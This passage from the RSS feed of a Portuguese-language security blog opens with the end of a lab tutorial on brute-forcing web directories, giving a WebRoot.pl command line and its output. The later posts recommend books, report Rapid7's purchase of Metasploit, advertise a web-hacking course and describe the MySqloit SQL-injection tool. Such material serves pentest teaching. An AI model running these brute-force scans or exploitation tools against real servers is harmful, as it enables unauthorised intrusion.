<p>FOUND: http://laboratorio.test/phpmyadmin/</p>
<p>(***) DIRECTORY (*)</p>
<p><strong> </strong></p>
<p>No output da ferramenta somos informados que a pasta phpmyadmin/  foi encontrada. Um atacante poderia agora efetuar um ataque direcionado para a aplicação PHPMyAdmin, como por exemplo tentar senhas de acesso default ou utilizar exploits para a versão em uso do PHPmyAdmin.</p>
<p>Um dos maiores problemas com ferramentas como o dirb é reconhecer se a mensagem de retorno do servidor  é a esperada ou não. Em casos onde o servidor  tem configurações avançadas (exemplo utilizando mod_rewrite) ferramentas automaticas não conseguem distinguir uma mensagem de resposta do servidor  sobre um determinado erro ao acessar uma pasta ou arquivo.</p>
<p>A aplicação WebRoot.pl escrita pelo CIRT.DK, tem mecanismos embutidos para trabalhar as respostas do servidor,  e baseado na frase especificada pelo atacante, consegue identificar se a resposta do servidor  é a esperada ou não.</p>
<p>./WebRoot.pl -noupdate -host laboratorio.test -port 80 -verbose -match &#8220;senha&#8221; -url &#8220;/private/&lt;BRUTE&gt;&#8221; -incremental lowercase -minimum 1 -maximum 1</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>o          Webserver Bruteforcing 1.8          o</p>
<p>0  ************* !!! WARNING !!! ************  0</p>
<p>0  ******* FOR PENETRATION USE ONLY *********  0</p>
<p>0  ******************************************  0</p>
<p>o       (c)2007 by Dennis Rand &#8211; CIRT.DK       o</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>[X] Checking for updates                &#8211; NO CHECK</p>
<p>[X] Checking for False Positive Scan    &#8211; OK</p>
<p>[X] Using Incremental                   &#8211; OK</p>
<p>[X] Starting Scan                       &#8211; OK</p>
<p>GET /private/b HTTP/1.1</p>
<p>GET /private/z HTTP/1.1</p>
<p>[X] Scan complete                       - OK</p>
<p>[X] Total attempts                      &#8211; 26</p>
<p>[X] Sucessfull attempts                 &#8211; 1</p>
<p>oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00oo00</p>
<p>WebRoot.pl encontrou um arquivo /private/b no laboratorio.test, que contem a frase “senha: 123mudar”</p>
<p><strong>Ferramentas para Identificar e proteger contra brute-forc e em aplicações Web.</strong></p>
<p><strong>Php-Brute-Force-Attack Detector</strong></p>
<p><a title="http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip" href="http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip">http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip</a></p>
<p>Esta ferramenta detecta se seu servidor esta sendo scanniado por ferramentas de brute-force como  WFuzz, Owasp DirBuster e scans e vulnerabilidades como Nessus, Nikto, Acunetix, etc. Ela pode ajudar você a rapidamente identificar possíveis hosts utilizados por atacantes que ficam efetuando testes em sua aplicações para identificar brechas e possíveis falhas de segurança</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/400/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/400/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/400/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=400&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2010/03/25/ataques-de-brute-force-em-aplicacoes-web/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Book of Month: January</title>
		<link>http://y2h4ck.wordpress.com/2010/01/20/book-of-month-january/</link>
		<comments>http://y2h4ck.wordpress.com/2010/01/20/book-of-month-january/#comments</comments>
		<pubDate>Wed, 20 Jan 2010 13:04:07 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[hacking books]]></category>
		<category><![CDATA[rootsecurity]]></category>
		<category><![CDATA[security books]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=397</guid>
		<description><![CDATA[Code Hacking: A Developer&#8217;s Guide To Network Security Author: Richard Conway, Julian Cordingley Publisher: Charles River Media Year: 2004 Pages: 450 Amazon&#8217;s book description: Developer&#8217;s Guide to Network Security provides a hands-on approach to learning the vital security skills. It details the software and techniques hackers use and provides practical insights on what&#8217;s really important [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=397&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.amazon.com/gp/product/1584503149?ie=UTF8&amp;tag=orkspace-20&amp;linkCode=as2&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1584503149" target="_blank"><img src="http://www.orkspace.net/secdocs/imgbooks/011.jpg" border="0" alt="" /></a></p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td><a href="http://www.amazon.com/gp/product/1584503149?ie=UTF8&amp;tag=orkspace-20&amp;linkCode=as2&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1584503149" target="_blank">Code Hacking: A Developer&#8217;s Guide To Network Security</a></td>
</tr>
<tr>
<td><strong>Author: </strong>Richard Conway, Julian Cordingley</td>
</tr>
<tr>
<td><strong>Publisher: </strong>Charles River Media</td>
</tr>
<tr>
<td><strong>Year: </strong>2004</td>
</tr>
<tr>
<td><strong>Pages: </strong>450</td>
</tr>
<tr>
<td><strong>Amazon&#8217;s book description: </strong>Developer&#8217;s Guide to Network Security provides a hands-on approach to learning the vital security skills. It details the software and techniques hackers use and provides practical insights on what&#8217;s really important in understanding hacking issues. The book cuts through the cursory issues and quickly delves into the essentials at a code and implementation level. It teaches users how to write and use scanners, sniffers, exploits, and more. It also helps developers write network security test harnesses for application and infrastructure. In addition, it covers how to create passive defense strategies to collect data on hackers, as well as how to use active defense strategies through techniques such as penetration testing. Unlike other books on hacking, Code Hacking takes a unique approach that covers hacking issues using a variety of languages. Software explanations and code samples are provided in C#, C++, Java, and Perl, allowing developers to learn from a variety of perspectives. The companion CD-ROM contains a custom security scanner written in C#. This scanner is a combination of a port and vulnerability scanner that scans IP addresses, allows certain services to be &#8220;brute forced,&#8221; and exploits well-known vulnerabilities.</td>
</tr>
</tbody>
</table>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/397/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/397/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/397/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=397&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2010/01/20/book-of-month-january/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>

		<media:content url="http://www.orkspace.net/secdocs/imgbooks/011.jpg" medium="image" />
	</item>
		<item>
		<title>Rapid-7 compra o Metasploit!!</title>
		<link>http://y2h4ck.wordpress.com/2009/10/29/rapid-7-compra-o-metasploit/</link>
		<comments>http://y2h4ck.wordpress.com/2009/10/29/rapid-7-compra-o-metasploit/#comments</comments>
		<pubDate>Thu, 29 Oct 2009 11:21:37 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[Other Stuff]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=394</guid>
		<description><![CDATA[Bom, aconteceu o que muitos esperavam e/ou temiam: O metasploit foi comprado! A responsável pelo feito foi a empresa Rapid-7,  que atua no mercado de venda de soluções para análise de vulnerabilidades e possui um framework que ao que parece irá assimilar o metasploit em sua engine para efetuar testes de penetração. Segundo uma nota [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=394&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bom, aconteceu o que muitos esperavam e/ou temiam: O metasploit foi comprado!</p>
<p>A responsável pelo feito foi a empresa Rapid-7,  que atua no mercado de venda de soluções para análise de vulnerabilidades e possui um framework que ao que parece irá assimilar o metasploit em sua engine para efetuar testes de penetração.</p>
<p>Segundo uma nota feita pelo CEO da Rapid-7, essa aquisição não irá impactar na distribuição do Metasploit em sua versão OpenSource ainda que ela será apoiada e suportada por toda a infra-estrutura da empresa.</p>
<p>HD Moore, fundador do projeto Metasploit irá ficar como responsável por coordenar o desenvolvimento da parte de engenharia das engines do metasploit junto à ferramenta da Rapid-7 e também como CSO da empresa.</p>
<p>Respondendo aos lamúrios da comunidade dependente e fan do Metasploit HD Moore disse que irá manter em contrato a continuidade do Metasploit Framework OpenSource e que não e preciso Pánico.</p>
<p>&nbsp;</p>
<p>Bom &#8230; não quero ser pessimista, longe de mim, porém todos nós ja vimos essa história e não foi apenas uma vez, podemos citar os casos de :</p>
<p>- Nessus</p>
<p>- SAINT</p>
<p>Ambos eram ferramentas de muita fama no cenário opensource, viraram software proprietário prometendo manter suas versões opensource, e qual foi a sucessão dos fatos:</p>
<p>- Versão OpenSource com Ongoing Updates cada vez mais raros seguida de versões cada vez mais limitadas e por fim, extinção total do suporte, restando apenas a versão Proprietária.</p>
<p>Tenham medo meus amigos &#8230; tenham mto medo !</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/394/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/394/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/394/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=394&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2009/10/29/rapid-7-compra-o-metasploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Curso: Web Application Hacking</title>
		<link>http://y2h4ck.wordpress.com/2009/09/30/curso-web-application-hacking/</link>
		<comments>http://y2h4ck.wordpress.com/2009/09/30/curso-web-application-hacking/#comments</comments>
		<pubDate>Wed, 30 Sep 2009 17:26:10 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=392</guid>
		<description><![CDATA[Convido todos os visitantes deste blog de São Paulo/Capital e região à participar de um Tracking de Segurança cujo tema é Web Application Hacking. O tracking consiste de um curso com a duração de um Sábado (das 9:00 as 19:00) com conteúdo voltado a testes de penetração em aplicações Web. Totalmente interativo e dinámico, todos [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=392&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div>
<p>Convido todos os visitantes deste blog de São Paulo/Capital e região à participar de um Tracking de Segurança cujo tema é Web Application Hacking. O tracking consiste de um curso com a duração de um Sábado (das 9:00 as 19:00) com conteúdo voltado a testes de penetração em aplicações Web. Totalmente interativo e dinámico, todos os tópicos serão abordados utilizando alto conteúdo teórico, challenges e laboratórios utilizando exemplos que visam adequar todo o conteúdo a realidade.</p>
<p>Entre os Tópicos abordados teremos:</p>
<p>- Code Quality Audit</p>
<p>- SQL Injection (sql/mysql)</p>
<p>- XSS</p>
<p>- XSFR</p>
<p>- Session Hijacking</p>
<p>- Remote File Injections</p>
<p>- Local File injections</p>
<p>- Data Tampering</p>
<p>- Veb Tampering</p>
<p>- Ajax Hacking</p>
<p>- HTTP Splitting Attacks</p>
<p>- Cookies Stealt</p>
<p>Entre muitos outros.</p>
<p>Para o conteúdo programático completo, datas e conteúdo utilizado  assim como valor, favor entrar em contato com pelo email y2h4ck@gmail.com</p>
<p>As datas serão divulgadas assim que as turmas de 15 pessoas estiverem completas. O valor é acessível e acredito que seja uma grande adição ao curriculum de profissionais de segurança.</p>
<p>O curso sera agendado para um sabado de Outubro, quanto antes tivemos o numero minimo de pessoas, antes faremos :)</p>
<p>Envie junto ao e-mail sua sugestao de data.</p>
<p>Forte abraco a todos.</p>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/392/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/392/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/392/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=392&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2009/09/30/curso-web-application-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>MySqloit &#8211; SQL Injection Takeover tool</title>
		<link>http://y2h4ck.wordpress.com/2009/09/09/mysqloit-sql-injection-takeover-tool/</link>
		<comments>http://y2h4ck.wordpress.com/2009/09/09/mysqloit-sql-injection-takeover-tool/#comments</comments>
		<pubDate>Wed, 09 Sep 2009 18:17:27 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[mysqloit]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=390</guid>
		<description><![CDATA[MySloit é uma tool para exploração de falhas de SQL Injection focada em LAMP(Linux, Apache, MySQL,PHP) e WAMP (Windows, Apache, MySQL,PHP). Ele tem a habilidade de fazer upload e executar shellcodes do metasploit através de falhas de MySQL SQL Injection. Atacantes efeutando SQL Injection em MySQL-PHP podem acabar se deparando com diversas limitações ao contrário [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=390&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MySloit é uma tool para exploração de falhas de SQL Injection focada em LAMP(Linux, Apache, MySQL,PHP) e WAMP (Windows, Apache, MySQL,PHP). Ele tem a habilidade de fazer upload e executar shellcodes do metasploit através de falhas de MySQL SQL Injection.</p>
<p>Atacantes efeutando SQL Injection em MySQL-PHP podem acabar se deparando com diversas limitações ao contrário do mesmo cenário ocorrendo em um Windows com SQL Server que permite muito mais facilidades para escalar privilégios e etc. Por exemplo a falta de multiplos statements em uma query faz o MySQL uma plataforma pouco popular para remote code execution. Essa ferramenta foi escrita justamente para demonstrar como a execução remota de códigos pode ser executada em um connector de banco de dados que não suporta stack queries.</p>
<p>Plataforma Suportada:</p>
<p>1) Linux</p>
<p>Key Features</p>
<p>1) SQL Injection detection using time based injection method</p>
<p>2) Database fingerprint</p>
<p>2) Web server directory fingerprint</p>
<p>3) Payload creation and execution</p>
<p>Download: <a href="http://mysqloit.googlecode.com/files/MySqloitv0.1.tar" target="_blank">Aqui</a></p>
<p>Faça o teste e mande os resultados aqui para que eu possa postar no blog :)</p>
<p>Good Hacking 4 All.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/390/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/390/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/390/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=390&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2009/09/09/mysqloit-sql-injection-takeover-tool/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>
	</item>
		<item>
		<title>Book of Month: September</title>
		<link>http://y2h4ck.wordpress.com/2009/09/03/book-of-month-september-2/</link>
		<comments>http://y2h4ck.wordpress.com/2009/09/03/book-of-month-september-2/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 14:36:00 +0000</pubDate>
		<dc:creator>y2h4ck</dc:creator>
				<category><![CDATA[General Hacking]]></category>
		<category><![CDATA[Book of Month]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security book]]></category>
		<category><![CDATA[shellcode]]></category>

		<guid isPermaLink="false">http://y2h4ck.wordpress.com/?p=388</guid>
		<description><![CDATA[The Shellcoder&#8217;s Handbook: Discovering and Exploiting Security Holes Author: Chris Anley, John Heasman, Felix Linder, Gerardo Richarte Publisher: Wiley Year: 2007 Pages: 718 Amazon&#8217;s book description: This much-anticipated revision, written by the ultimate group of top security experts in the world, features 40 percent new content on how to find security holes in any operating [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=388&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.amazon.com/gp/product/047008023X?ie=UTF8&amp;tag=orkspace-20&amp;linkCode=as2&amp;camp=1789&amp;creative=9325&amp;creativeASIN=047008023X" target="_blank"><img src="http://www.orkspace.net/secdocs/imgbooks/002.jpg" border="0" alt="" /></a></p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td><a href="http://www.amazon.com/gp/product/047008023X?ie=UTF8&amp;tag=orkspace-20&amp;linkCode=as2&amp;camp=1789&amp;creative=9325&amp;creativeASIN=047008023X" target="_blank">The Shellcoder&#8217;s Handbook: Discovering and Exploiting Security Holes</a></td>
</tr>
<tr>
<td><strong>Author: </strong>Chris Anley, John Heasman, Felix  Linder, Gerardo Richarte</td>
</tr>
<tr>
<td><strong>Publisher: </strong>Wiley</td>
</tr>
<tr>
<td><strong>Year: </strong>2007</td>
</tr>
<tr>
<td><strong>Pages: </strong>718</td>
</tr>
<tr>
<td><strong>Amazon&#8217;s book description: </strong> This much-anticipated revision, written by the ultimate group of top security experts in the world, features 40 percent new content on how to find security holes in any operating system or application. New material addresses the many new exploitation techniques that have been discovered since the first edition, including attacking &#8220;unbreakable&#8221; software packages such as McAfee&#8217;s Entercept, Mac OS X, XP, Office 2003, and Vista. Also features the first-ever published information on exploiting Cisco&#8217;s IOS, with content that has never before been explored. The companion Web site features downloadable code files.</td>
</tr>
</tbody>
</table>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/y2h4ck.wordpress.com/388/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/y2h4ck.wordpress.com/388/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/y2h4ck.wordpress.com/388/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=y2h4ck.wordpress.com&amp;blog=2298308&amp;post=388&amp;subd=y2h4ck&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://y2h4ck.wordpress.com/2009/09/03/book-of-month-september-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">y2h4ck</media:title>
		</media:content>

		<media:content url="http://www.orkspace.net/secdocs/imgbooks/002.jpg" medium="image" />
	</item>
	</channel>
</rss>
